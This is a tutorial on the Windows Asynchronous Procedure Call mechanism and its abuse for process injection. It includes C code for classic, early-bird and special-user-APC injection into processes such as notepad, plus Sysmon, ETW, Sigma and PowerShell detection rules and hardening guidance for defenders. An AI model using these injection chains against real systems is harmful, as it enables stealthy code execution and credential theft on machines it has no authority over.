Objective: Understand the Windows Asynchronous Procedure Call mechanism from the kernel up — the KAPC / KAPC_STATE structures, the dispatch path through KiInsertQueueApc and KiDeliverApc, the alertable-wait requirement, and the three abuse variants (classic, early-bird, special user APC) used for thread hijacking and process injection — and detect them with Sysmon, ETW-TI, and audit policy.

1. APC Fundamentals — What the OS Actually Uses APCs For

An Asynchronous Procedure Call is a function that executes asynchronously in the context of a specific thread. When the kernel queues an APC, it raises a software interrupt and arranges for the routine to run the next time that thread is dispatched. Every thread has its own APC queue — APCs are inherently thread-targeted, which is exactly why offensive tooling loves them.

The OS itself relies on APCs for normal work:

Completion callbacks: ReadFileEx and WriteFileEx deliver their I/O completion routines, and SetWaitableTimer delivers its timer completion routine, via a user-mode APC queued back to the calling thread.
File-system filter callbacks: normal kernel APCs are widely used by file systems and minifilters.
Wait abortion: queuing a user APC against a thread in an alertable wait satisfies the wait with STATUS_USER_APC.

Understanding APCs means understanding three things in sequence: who can queue them, when they fire, and what the thread looks like at the moment they fire.

2. The Three Flavours of APCs

APCs differ by IRQL and by who is allowed to queue them. The kernel maintains distinct semantics for each.

Type	IRQL	Notes
Special Kernel APC	`APC_LEVEL`	Runs in kernel mode at IRQL `APC_LEVEL`; preempts user-mode code and kernel-mode code executing at `PASSIVE_LEVEL`. Used by the OS for operations such as I/O request completion.
Normal Kernel APC	`PASSIVE_LEVEL`	Runs in kernel mode at `PASSIVE_LEVEL`; preempts all user-mode code, including user APCs. Generally used by file systems and file-system filter drivers.
User-mode APC	`PASSIVE_LEVEL`	Generated by an application. The target thread must be in an alertable state for a user-mode APC to run.

Unlike deferred procedure calls (DPCs), which run in arbitrary thread context, an APC always executes inside a specific thread’s context — that property is what makes APCs both useful for I/O completion and dangerous as an injection primitive.

Hierarchy diagram showing the three APC types: Kernel-Mode, User-Mode, and Special User APC, with their respective queuing APIs and alertable-wait requirements — The three APC flavours differ by privilege level, delivery trigger, and the Win32/native APIs used to queue them.

3. Kernel Structures: `KAPC`, `KAPC_STATE`, `KTHREAD`

A queued APC is represented in the kernel by a KAPC object. The thread tracks its pending APCs via a KAPC_STATE embedded in KTHREAD.

// Conceptual layout — field names are illustrative; confirm against the
// target Windows build with `dt nt!_KAPC` / `dt nt!_KAPC_STATE` in WinDbg.

typedef struct _KAPC {
    UCHAR              Type;
    UCHAR              SpareByte0;
    UCHAR              Size;
    UCHAR              SpareByte1;
    ULONG              SpareLong0;
    struct _KTHREAD   *Thread;
    LIST_ENTRY         ApcListEntry;
    PKKERNEL_ROUTINE   KernelRoutine;
    PKRUNDOWN_ROUTINE  RundownRoutine;
    PKNORMAL_ROUTINE   NormalRoutine;
    PVOID              NormalContext;
    PVOID              SystemArgument1;
    PVOID              SystemArgument2;
    CCHAR              ApcStateIndex;
    KPROCESSOR_MODE    ApcMode;
    BOOLEAN            Inserted;
} KAPC, *PKAPC;

typedef struct _KAPC_STATE {
    LIST_ENTRY         ApcListHead[2];   // [0] = kernel APCs, [1] = user APCs
    struct _KPROCESS  *Process;
    BOOLEAN            KernelApcInProgress;
    BOOLEAN            KernelApcPending;
    BOOLEAN            UserApcPending;
    // SpecialUserApcPending was added later for RS5+ Special User APCs.
} KAPC_STATE, *PKAPC_STATE;

Key fields the dispatcher and attackers both care about:

KAPC.NormalRoutine — the function the thread will eventually execute.
KAPC.NormalContext, SystemArgument1, SystemArgument2 — arguments passed to NormalRoutine.
KAPC.ApcMode — KernelMode vs UserMode, controls which queue and which delivery path.
KAPC_STATE.ApcListHead[2] — two doubly-linked lists; index 0 holds kernel-mode APCs, index 1 holds user-mode APCs.
KAPC_STATE.UserApcPending — set to TRUE when a user APC is queued and the thread is in an alertable wait; this is the signal that breaks the wait with STATUS_USER_APC.

4. The Alertable Wait Requirement

A user-mode APC does not fire whenever the kernel wants — it fires only when the target thread is willing to be interrupted. A thread enters an alertable state by calling one of:

SleepEx()
SignalObjectAndWait()
MsgWaitForMultipleObjectsEx()
WaitForMultipleObjectsEx()
WaitForSingleObjectEx()

with the bAlertable parameter set to TRUE (MsgWaitForMultipleObjectsEx has no bAlertable parameter; it takes the MWMO_ALERTABLE flag in dwFlags instead). Additionally, ReadFileEx, WriteFileEx, and SetWaitableTimer use APCs as their completion-notification mechanism, so threads driving overlapped I/O routinely sit in alertable waits.

This alertable-state requirement is the single most important property to understand offensively and defensively:

Offensively, it dictates target selection. Long-lived service threads in svchost.exe or explorer.exe that pump I/O are reliable targets; threads that never enter an alertable wait will never run a queued user APC.
Defensively, it explains why the classic injection works against some processes and not others — and why attackers eventually moved to Special User APCs to remove the dependency entirely (§9).
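The delivery rule can be made concrete with a toy model. The following is a minimal Python sketch, not kernel code: `ToyThread` and its methods are hypothetical names, and the model keeps only the two properties described above (a per-thread user APC list, and delivery gated on an alertable wait).

```python
from collections import deque
from dataclasses import dataclass, field

KERNEL_MODE, USER_MODE = 0, 1  # same indexing idea as ApcListHead[2]


@dataclass
class ToyThread:
    """Hypothetical stand-in for the APC-relevant part of a thread."""
    apc_lists: tuple = field(default_factory=lambda: (deque(), deque()))
    alertable_wait: bool = False
    user_apc_pending: bool = False

    def queue_user_apc(self, routine):
        """Queue a callable; mark it pending only if the thread is alertable."""
        self.apc_lists[USER_MODE].append(routine)
        if self.alertable_wait:
            self.user_apc_pending = True

    def enter_alertable_wait(self):
        """Model SleepEx(..., TRUE): already-queued user APCs satisfy the wait."""
        self.alertable_wait = True
        if self.apc_lists[USER_MODE]:
            self.user_apc_pending = True
        return self.deliver()

    def deliver(self):
        """Run pending user APCs in FIFO order and return their results."""
        results = []
        if self.user_apc_pending:
            while self.apc_lists[USER_MODE]:
                results.append(self.apc_lists[USER_MODE].popleft()())
            self.user_apc_pending = False
            self.alertable_wait = False  # the wait ended (STATUS_USER_APC)
        return results


if __name__ == "__main__":
    t = ToyThread()
    t.queue_user_apc(lambda: "apc-1")
    print(t.deliver())               # nothing runs: the thread never became alertable
    print(t.enter_alertable_wait())  # the queued routine runs now
```

The model deliberately omits kernel APCs, Special User APCs, and wait modes; it only shows why a routine queued to a thread that never waits alertably stays in the queue indefinitely.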

5. Win32 → Native → Kernel Call Chain

Queuing a user APC traverses three layers.

API / Symbol	Layer	Description
`QueueUserAPC`	Win32 (`kernel32.dll`)	Queues a user-mode APC to a target thread.
`NtQueueApcThread`	NT native (`ntdll.dll`)	Syscall used internally by `QueueUserAPC` to deliver the APC.
`NtQueueApcThreadEx`	NT native	Extended form; RS5 introduced Special User APCs queued by passing `1` as the reserve handle.
`NtQueueApcThreadEx2`	NT native	Newer variant exposing both `UserApcFlags` and `MemoryReserveHandle`.
`QueueUserAPC2`	`kernelbase.dll`	Wrapper that exposes Special User APCs to user code.
`KeInsertQueueApc`	Kernel	Attaches the initialized `KAPC` to the target thread’s queue.
`KiDeliverApc`	Kernel	Dispatches pending APCs at the kernel→user transition.
`ntdll!RtlDispatchAPC`	ntdll	Trampoline in user mode that calls the caller-supplied `APCProc`.

An important internal detail: when you call QueueUserAPC(pfn, hThread, dwData), the function pointer that QueueUserAPC actually hands to NtQueueApcThread is not your pfn. It is ntdll!RtlDispatchAPC, and your pfn is passed to it as a parameter. This is why call-stack-aware EDRs frequently see RtlDispatchAPC as the immediate caller of the suspicious user-mode routine.

The dispatch sequence for a user-mode APC:

Caller obtains a thread handle with THREAD_SET_CONTEXT access.
QueueUserAPC → NtQueueApcThread → kernel enters KiInsertQueueApc.
KiInsertQueueApc checks whether the target is in an alertable wait with WaitMode == UserMode. If yes, it sets UserApcPending = TRUE and completes the wait with STATUS_USER_APC.
On the kernel→user transition, KiDeliverApc builds a user-mode frame that enters ntdll!KiUserApcDispatcher, which calls ntdll!RtlDispatchAPC, which in turn invokes the original APCProc.

Flow diagram of the APC dispatch chain from QueueUserAPC through NtQueueApcThread, KiInsertQueueApc, KiDeliverApc, RtlDispatchAPC, to the final APCProc callback — Every layer of the APC dispatch chain is observable; EDRs see RtlDispatchAPC as the immediate caller of the injected routine.

6. Inspecting APC State in WinDbg

Read-only kernel introspection lets defenders and learners watch the structures the dispatcher mutates.

0: kd> !process 0 0 lsass.exe
0: kd> .process /r /p <EPROCESS>
0: kd> !thread <ETHREAD>

0: kd> dt nt!_KTHREAD <addr> ApcState
0: kd> dt nt!_KAPC_STATE <addr+offset>
   +0x000 ApcListHead       : [2] _LIST_ENTRY
   +0x020 Process           : Ptr64 _KPROCESS
   +0x028 KernelApcInProgress : UChar
   +0x029 KernelApcPending  : UChar
   +0x02a UserApcPending    : UChar

0: kd> !list "-t nt!_KAPC.ApcListEntry.Flink -e -x \"dt nt!_KAPC @$extret\" <ApcListHead[1]>"

Walking ApcListHead[1] for any thread reveals every pending user APC — its NormalRoutine, NormalContext, and ApcMode. On a healthy thread you typically see nothing; finding NormalRoutine pointing into a private RX region inside a system process is a classic incident-response artifact.
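Once the NormalRoutine values have been copied out of the debugger, the triage step is a range check against the loaded-module list. The sketch below assumes the analyst has already exported both lists by hand; `Module`, `owning_module`, `unbacked_routines`, and all addresses are hypothetical illustrations, not output from a real system.

```python
from typing import NamedTuple, Optional, Sequence


class Module(NamedTuple):
    name: str
    base: int
    size: int


def owning_module(address: int, modules: Sequence[Module]) -> Optional[str]:
    """Return the name of the module whose image range contains address."""
    for m in modules:
        if m.base <= address < m.base + m.size:
            return m.name
    return None


def unbacked_routines(routines: Sequence[int], modules: Sequence[Module]) -> list:
    """Return routine addresses that fall outside every loaded image."""
    return [a for a in routines if owning_module(a, modules) is None]


if __name__ == "__main__":
    # Made-up module list and NormalRoutine values for illustration only.
    modules = [
        Module("ntdll.dll", 0x7FFA10000000, 0x1F0000),
        Module("kernel32.dll", 0x7FFA0F000000, 0xC0000),
    ]
    routines = [0x7FFA10012340, 0x000001D0A0000000]
    for addr in unbacked_routines(routines, modules):
        print(f"NormalRoutine {addr:#x} is not backed by a loaded image")
```

An address outside every image is a lead rather than a verdict: JIT engines and some runtimes legitimately execute from private memory, so the hit should be confirmed against the region's protection and contents.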

7. Classic APC Injection

The textbook variant. Every API call below is observable; the technique relies entirely on existing, documented APIs.

// Educational illustration of the API call chain only.
// No payload is included; `payload` is a placeholder used by defenders to
// recognize the pattern. Authorized testing only.

#include <windows.h>
#include <tlhelp32.h>

BOOL InjectViaAPC(DWORD pid, DWORD tid, const BYTE *payload, SIZE_T cb) {
    HANDLE hProc = OpenProcess(
        PROCESS_VM_OPERATION | PROCESS_VM_WRITE | PROCESS_QUERY_INFORMATION,
        FALSE, pid);
    if (!hProc) return FALSE;

    HANDLE hThread = OpenThread(THREAD_SET_CONTEXT, FALSE, tid);
    if (!hThread) { CloseHandle(hProc); return FALSE; }

    LPVOID remote = VirtualAllocEx(hProc, NULL, cb,
                                   MEM_COMMIT | MEM_RESERVE,
                                   PAGE_EXECUTE_READWRITE);
    WriteProcessMemory(hProc, remote, payload, cb, NULL);

    // QueueUserAPC schedules execution; it fires only when the target
    // thread enters an alertable wait.
    QueueUserAPC((PAPCFUNC)remote, hThread, 0);

    CloseHandle(hThread);
    CloseHandle(hProc);
    return TRUE;
}

Trigger conditions:

The target thread (tid) must enter an alertable wait. In long-lived service hosts this happens routinely.
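The handle to the thread must carry THREAD_SET_CONTEXT (0x0010). Sysmon EID 10 (ProcessAccess) reports process-handle opens only, so the canonical Sysmon signal is the companion OpenProcess call: a GrantedAccess mask that includes PROCESS_VM_OPERATION (0x0008) and PROCESS_VM_WRITE (0x0020) against a high-value target image (§12). The thread-handle request itself has to be observed through Security auditing or EDR object callbacks.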

Notably, no new thread is created in the victim process — CreateRemoteThread is not called. This is exactly why APC injection evades Sysmon EID 8.

8. Early-Bird APC Injection

Classic injection has one weakness: you cannot predict when the victim thread will next become alertable. Early-bird removes the guesswork by injecting into a process you create yourself in a suspended state, then queuing the APC against the main thread before it has executed a single instruction.

// Educational pseudocode — illustrates API sequence, not payload.

STARTUPINFOA si = { sizeof(si) };
PROCESS_INFORMATION pi = { 0 };

CreateProcessA(NULL, "C:\\Windows\\System32\\notepad.exe", NULL, NULL,
               FALSE, CREATE_SUSPENDED, NULL, NULL, &si, &pi);

LPVOID remote = VirtualAllocEx(pi.hProcess, NULL, cb,
                               MEM_COMMIT | MEM_RESERVE,
                               PAGE_EXECUTE_READWRITE);
WriteProcessMemory(pi.hProcess, remote, payload, cb, NULL);

QueueUserAPC((PAPCFUNC)remote, pi.hThread, 0);

// Thread services its APC queue as part of initialization, *before*
// running the original entry point.
ResumeThread(pi.hThread);

Why it works: a newly created thread begins user-mode execution in ntdll!LdrInitializeThunk, which calls NtTestAlert once loader initialization finishes and thereby drains the thread's user APC queue. Any user APC queued before ResumeThread is therefore delivered in that early window, before the legitimate entry point runs.

This variant straddles two ATT&CK sub-techniques: it is APC injection (T1055.004) but it also resembles Thread Execution Hijacking (T1055.003) because the suspended-thread-then-redirect pattern is structurally the same primitive.

Flow diagram of the Early-Bird APC injection sequence showing CreateProcess in suspended state, memory staging, APC queuing, ResumeThread, and payload execution before the legitimate entry point. Early-Bird queues the APC before the main thread has executed a single instruction; it is delivered when LdrInitializeThunk drains the APC queue at the end of initialization.

9. Special User APCs (RS5+): Bypassing the Alertable Requirement

Starting with Windows 10 RS5 (version 1809), the kernel introduced Special User APCs. The key behavioural change: the kernel signals the target thread with a kernel-mode APC, which forces the user-mode routine to be delivered at the thread's next return to user mode. The thread is interrupted mid-execution to run the special APC, so the alertable-state requirement is gone.

They are queued via NtQueueApcThreadEx (passing 1 as the reserve handle) or through NtQueueApcThreadEx2, which exposes a flags field. kernelbase!QueueUserAPC2 is the documented Win32 wrapper.

// Conceptual signatures — confirm flag values and syscall semantics
// against the target SDK / Windows build before relying on them.

typedef NTSTATUS (NTAPI *pNtQueueApcThreadEx2)(
    HANDLE         ThreadHandle,
    HANDLE         UserApcReserveHandle,   // optional reserve object
    ULONG          ApcFlags,               // e.g. QUEUE_USER_APC_FLAGS_SPECIAL_USER_APC
    PVOID          ApcRoutine,
    PVOID          SystemArgument1,
    PVOID          SystemArgument2,
    PVOID          SystemArgument3);

// Pseudocode dispatch — `Special User APC` interrupts a running thread
// without requiring it to be in SleepEx / WaitForSingleObjectEx.
pNtQueueApcThreadEx2 fn = (pNtQueueApcThreadEx2)
    GetProcAddress(GetModuleHandleW(L"ntdll.dll"), "NtQueueApcThreadEx2");

fn(hThread,
   NULL,
   QUEUE_USER_APC_FLAGS_SPECIAL_USER_APC,   // forces in-execution delivery
   remote_routine,
   NULL, NULL, NULL);

Internally the kernel sets SpecialUserApcPending (added to KAPC_STATE for this purpose) and arranges delivery at the next return-to-user-mode opportunity regardless of wait state. This is a meaningful escalation of the primitive — it converts APC injection from “wait until the thread cooperates” to “interrupt the thread now.”

10. Real-World Threat Actor Usage

APC injection is documented at the technique level rather than the family level here; defenders should treat it as a primitive that recurs across many tradecraft variants:

DOUBLEPULSAR used kernel-mode APC injection to redirect user-mode threads from a kernel implant.
Multiple commodity and APT families catalogued under MITRE T1055.004 employ classic user-APC injection against svchost.exe, explorer.exe, and other long-running hosts.
The AtomBombing family of injection variants combines GlobalAddAtom with NtQueueApcThread to stage code through atom tables and then dispatch it via APC.
Recent research (Check Point’s Thread Name-Calling) chains thread-name primitives with APC dispatch to evade EDR userland hooks.

11. Common Attacker Techniques

Technique	Description
Classic APC Injection	`OpenProcess` → `OpenThread(THREAD_SET_CONTEXT)` → `VirtualAllocEx` → `WriteProcessMemory` → `QueueUserAPC`. Fires when the target thread next enters an alertable wait.
Early-Bird APC	`CreateProcess(CREATE_SUSPENDED)` → write payload → `QueueUserAPC` → `ResumeThread`. APC fires during loader init, before the entry point.
Special User APC	`NtQueueApcThreadEx` / `NtQueueApcThreadEx2` with `QUEUE_USER_APC_FLAGS_SPECIAL_USER_APC` — interrupts the thread mid-execution; no alertable wait required.
Kernel APC injection from a driver	Malicious driver calls `KeInsertQueueApc` directly against a user thread (DOUBLEPULSAR class). Mitigated by HVCI / driver signing.
Atom-table staged APC (AtomBombing)	Payload bytes shuttled into target via atom tables, then dispatched with `NtQueueApcThread`. Evades naive memory-write detections.
Self-APC for unhooking / staging	Queue an APC to the current thread + `SleepEx(0, TRUE)` to execute code outside hooked call paths.

12. Defensive Strategies & Detection

APC injection is deliberately quiet — it does not create a remote thread and so does not emit Sysmon EID 8. Detection therefore pivots on the handle-acquisition and memory-staging stages, plus dedicated ETW.

12.1 Sysmon

Event ID	Name	Why It Matters Here
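EID 10	`ProcessAccess`	Captures the `OpenProcess` step only; thread-handle opens are not logged by this event. `GrantedAccess` masks that include `PROCESS_VM_OPERATION` (`0x0008`) and `PROCESS_VM_WRITE` (`0x0020`) against high-value images are the strongest signal. `THREAD_SET_CONTEXT` (`0x0010`) is a thread access right and must be observed elsewhere (§12.3).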
EID 8	`CreateRemoteThread`	Will not fire for pure APC injection — but does fire for hybrid variants and is useful as a negative signal.
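EID 1	`ProcessCreate`	Does not record creation flags such as `CREATE_SUSPENDED`, but exposes the unusual parent/child pairs typical of Early-Bird. Correlate with an EID 10 from the parent against the new child and with short process lifetimes.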
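Because process and thread access rights reuse the same low bits, a raw mask is easy to misread. The following is a small Python sketch for decoding a hex mask against either table; the constant values are the ones defined in the Windows SDK headers, while `decode` and `allows_remote_write` are hypothetical helper names.

```python
# Subset of the access-right constants defined in the Windows SDK (winnt.h).
PROCESS_RIGHTS = {
    0x0001: "PROCESS_TERMINATE",
    0x0002: "PROCESS_CREATE_THREAD",
    0x0008: "PROCESS_VM_OPERATION",
    0x0010: "PROCESS_VM_READ",
    0x0020: "PROCESS_VM_WRITE",
    0x0040: "PROCESS_DUP_HANDLE",
    0x0400: "PROCESS_QUERY_INFORMATION",
    0x1000: "PROCESS_QUERY_LIMITED_INFORMATION",
}
THREAD_RIGHTS = {
    0x0001: "THREAD_TERMINATE",
    0x0002: "THREAD_SUSPEND_RESUME",
    0x0008: "THREAD_GET_CONTEXT",
    0x0010: "THREAD_SET_CONTEXT",
    0x0020: "THREAD_SET_INFORMATION",
    0x0040: "THREAD_QUERY_INFORMATION",
}


def decode(mask_text, rights):
    """Return the names of the rights set in a hex mask such as '0x1410'."""
    mask = int(mask_text, 16)
    return [name for bit, name in sorted(rights.items()) if mask & bit]


def allows_remote_write(mask_text):
    """True if a process mask grants both VM_OPERATION and VM_WRITE."""
    needed = 0x0008 | 0x0020
    return (int(mask_text, 16) & needed) == needed


if __name__ == "__main__":
    print(decode("0x18", THREAD_RIGHTS))   # thread interpretation of 0x18
    print(decode("0x18", PROCESS_RIGHTS))  # process interpretation of the same bits
    print(allows_remote_write("0x1fffff"))
```

The same bits `0x18` mean get/set context on a thread handle but VM operation/read on a process handle, which is why the object type has to be known before a mask is interpreted.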

12.2 ETW — `Microsoft-Windows-Threat-Intelligence`

The Threat Intelligence ETW provider exposes a dedicated APC-injection sensor:

THREATINT_QUEUEUSERAPC_REMOTE_KERNEL_CALLER, with the counterpart THREATINT_QUEUEUSERAPC_REMOTE for user-mode callers. These are logged by EtwTiLogInsertQueueUserApc / EtwTiLogQueueApcThread, invoked from inside KeInsertQueueApc. Introduced in Windows 10 version 1809 (RS5).

Consumption requires a signed ELAM driver; the provider is reserved for AntiMalware-protected processes. In practice you receive this telemetry through your EDR vendor’s sensor.

12.3 Audit Policy

Enable Object Access → Audit Kernel Object → Security log EIDs 4656 / 4663 on handle requests to process and thread objects that carry a SACL. Filter for Object Type = Process with VM-write rights, or Object Type = Thread with access masks including THREAD_SET_CONTEXT (0x0010).
Enable Audit Process Creation → EID 4688 with full command-line logging. Pair with CREATE_SUSPENDED heuristics where parent process behaviour permits inference.

12.4 Sigma Detection (Conceptual)

title: Suspicious Cross-Process Handle Acquisition Consistent With APC Injection
id: 00000000-0000-0000-0000-000000000000   # placeholder; generate a real UUID before use
status: experimental
logsource:
  product: windows
  category: process_access   # Sysmon EID 10
detection:
  selection:
    TargetImage|endswith:
      - '\lsass.exe'
      - '\svchost.exe'
      - '\explorer.exe'
      - '\winlogon.exe'
    # Sysmon reports process rights only and prints masks without zero padding.
    # Each value below includes PROCESS_VM_OPERATION (0x8) and PROCESS_VM_WRITE (0x20).
    GrantedAccess:
      - '0x28'
      - '0x38'
      - '0x3a'
      - '0x1f3fff'
      - '0x1fffff'   # PROCESS_ALL_ACCESS
  condition: selection
falsepositives:
  - Endpoint security products and legitimate debuggers
level: high

12.5 Behavioural Heuristics

The fingerprint that hunts well: VirtualAllocEx (RWX) → WriteProcessMemory → NtQueueApcThread issued by the same source process within a short window. Even when individual calls are noisy, the ordering is rare in benign software.
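The ordering heuristic can be prototyped offline against normalized telemetry. The sketch below assumes events have already been reduced to dictionaries with hypothetical keys `ts` (seconds), `source_pid`, `target_pid`, and `op` (one of `alloc`, `write`, `queue_apc`); real EDR or ETW-TI field names will differ, and `find_chains` is an illustrative name.

```python
EXPECTED = ("alloc", "write", "queue_apc")


def find_chains(events, window=5.0):
    """Return (source_pid, target_pid, start_ts) for each ordered
    alloc -> write -> queue_apc chain completed within `window` seconds."""
    progress = {}  # (source_pid, target_pid) -> (next step index, chain start)
    hits = []
    for ev in sorted(events, key=lambda e: e["ts"]):
        key = (ev["source_pid"], ev["target_pid"])
        idx, start = progress.get(key, (0, None))
        if idx and ev["ts"] - start > window:
            idx, start = 0, None  # chain went stale; start over
        if ev["op"] == EXPECTED[idx]:
            if idx == 0:
                start = ev["ts"]
            idx += 1
            if idx == len(EXPECTED):
                hits.append((key[0], key[1], start))
                idx, start = 0, None
        progress[key] = (idx, start)
    return hits


if __name__ == "__main__":
    sample = [
        {"ts": 0.0, "source_pid": 100, "target_pid": 200, "op": "alloc"},
        {"ts": 0.4, "source_pid": 100, "target_pid": 200, "op": "write"},
        {"ts": 0.9, "source_pid": 100, "target_pid": 200, "op": "queue_apc"},
    ]
    print(find_chains(sample))
```

Keying the state on the source/target pair keeps unrelated processes from completing each other's chains; the window length is a tuning choice, not a documented threshold.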

12.6 PowerShell — Hunt for Suspicious `ProcessAccess` Masks

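# Resolve fields by name: positional indexes in Properties[] shift between Sysmon schema versions.
Get-WinEvent -FilterHashtable @{ LogName = 'Microsoft-Windows-Sysmon/Operational'; Id = 10 } |
  ForEach-Object {
      $evt = $_
      $d = @{}
      foreach ($n in ([xml]$evt.ToXml()).Event.EventData.Data) { $d[$n.Name] = $n.'#text' }
      $mask = [Convert]::ToInt64($d['GrantedAccess'], 16)   # accepts the 0x prefix
      # 0x28 = PROCESS_VM_OPERATION | PROCESS_VM_WRITE
      if ((($mask -band 0x28) -eq 0x28) -and
          ($d['TargetImage'] -match '\\(lsass|svchost|winlogon)\.exe$')) {
          [pscustomobject]@{
              TimeCreated = $evt.TimeCreated
              Source      = $d['SourceImage']
              Target      = $d['TargetImage']
              Access      = $d['GrantedAccess']
          }
      }
  }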
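For events exported as XML (for example from a SIEM or an offline .evtx conversion), the field lookup is more robust when done by name than by position. This is a minimal Python sketch using only the standard library; `event_data` is a hypothetical helper and the sample event is hand-written for illustration, not captured telemetry.

```python
import xml.etree.ElementTree as ET

# Namespace used by Windows event XML.
NS = {"e": "http://schemas.microsoft.com/win/2004/08/events/event"}

SAMPLE = r"""<Event xmlns="http://schemas.microsoft.com/win/2004/08/events/event">
  <System><EventID>10</EventID></System>
  <EventData>
    <Data Name="SourceImage">C:\Tools\example.exe</Data>
    <Data Name="TargetImage">C:\Windows\System32\lsass.exe</Data>
    <Data Name="GrantedAccess">0x1fffff</Data>
  </EventData>
</Event>"""


def event_data(xml_text):
    """Map each <Data Name="..."> element to its text, keyed by field name."""
    root = ET.fromstring(xml_text)
    return {
        d.get("Name"): (d.text or "")
        for d in root.findall("./e:EventData/e:Data", NS)
    }


if __name__ == "__main__":
    fields = event_data(SAMPLE)
    mask = int(fields["GrantedAccess"], 16)
    wants_write = (mask & 0x28) == 0x28  # PROCESS_VM_OPERATION | PROCESS_VM_WRITE
    print(fields["SourceImage"], "->", fields["TargetImage"], wants_write)
```

Looking fields up by name means the filter keeps working if a Sysmon schema update inserts or reorders fields.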

12.7 Hardening

Mitigation	Description
Protected Process Light (PPL)	LSASS running as a PPL (enabled with `RunAsPPL`; signer level `Lsa`) blocks write-capable `OpenProcess` and `OpenThread(THREAD_SET_CONTEXT)` requests from non-protected callers.
Credential Guard	Moves LSASS secrets into a VSM-isolated process (`LsaIso.exe`), so code injected into `lsass.exe` no longer has direct access to them.
HVCI / Code Integrity	Prevents unsigned kernel drivers from calling `KeInsertQueueApc` against arbitrary threads.
ASR rule `9e6c4e1f-7d60-472f-ba1a-a39ef669e4b2`	Blocks credential theft from LSASS; complements but does not directly block APC injection.
Minimize alertable waits in sensitive code	Avoid `SleepEx(n, TRUE)` and other alertable waits in privileged service threads unless required.
ETW-TI via EDR	Deploy AV/EDR with an ELAM driver to consume `Microsoft-Windows-Threat-Intelligence` events in real time.

Graph diagram mapping four detection controls — Sysmon EID 10, ETW-TI, Audit EID 4656, and behavioural sequencing — plus hardening measures against the APC injection threat — Because APC injection skips CreateRemoteThread, detection pivots to handle-acquisition telemetry and dedicated ETW-TI sensors rather than Sysmon EID 8.

13. Tools for APC Analysis

Tool	Description	Link
WinDbg	Walk `KTHREAD.ApcState`, dump `KAPC` entries via `!list`, inspect `UserApcPending`.	microsoft.com
Process Hacker	Per-thread inspection, including private RX allocations and thread call stacks indicative of injected code.	processhacker.sourceforge.io
Sysmon	EID 10 / 8 / 1 telemetry for the handle-open and process-creation halves of the chain.	sysinternals.com
Sysinternals `handle.exe`	Enumerate handles a suspect process holds (look for foreign `Thread` / `Process` handles).	sysinternals.com
Volatility 3	Memory forensics: walk thread APC queues post-incident; identify injected RX regions.	volatilityfoundation.org
ETW Explorer / SilkETW	Inspect or subscribe to ETW providers (ETW-TI requires signed ELAM).	github.com
x64dbg	User-mode dynamic analysis of `QueueUserAPC` / `RtlDispatchAPC` call chains.	x64dbg.com

14. MITRE ATT&CK Mapping

Technique	MITRE ID	Detection
Process Injection	T1055	Behavioural sequence: cross-process handle with VM-write rights followed by APC queuing.
Process Injection: Asynchronous Procedure Call	T1055.004	Sysmon EID 10 with `PROCESS_VM_WRITE` on the target process; thread-handle auditing for `THREAD_SET_CONTEXT`; ETW-TI `THREATINT_QUEUEUSERAPC_REMOTE_KERNEL_CALLER`.
Thread Execution Hijacking	T1055.003	Early-Bird variant: `CREATE_SUSPENDED` process + `THREAD_SET_CONTEXT` handle + early-window APC.

T1055.004 is the primary mapping for this tutorial. The Early-Bird variant (§8) overlaps with T1055.003 because the suspended-thread + redirection structure is the same primitive — defenders should detect both.

Summary

APCs are a legitimate kernel facility for thread-targeted asynchronous work, and that property is exactly what makes them a first-class injection primitive.
The dispatch chain is QueueUserAPC → NtQueueApcThread → KiInsertQueueApc → KiDeliverApc → ntdll!RtlDispatchAPC → caller routine; every layer is observable.
User APCs require an alertable wait; Early-Bird sidesteps this via CREATE_SUSPENDED, and Special User APCs (NtQueueApcThreadEx2 + QUEUE_USER_APC_FLAGS_SPECIAL_USER_APC) eliminate the requirement entirely.
APC injection deliberately evades Sysmon EID 8; detection pivots on EID 10 with PROCESS_VM_OPERATION (0x0008) and PROCESS_VM_WRITE (0x0020) against high-value targets, on thread-handle requests carrying THREAD_SET_CONTEXT (0x0010), and on Microsoft-Windows-Threat-Intelligence ETW (EtwTiLogInsertQueueUserApc).
Map to T1055.004 for classic / special-user APC, and additionally to T1055.003 for the Early-Bird suspended-thread variant; harden with PPL, Credential Guard, HVCI, and ETW-TI-consuming EDR.
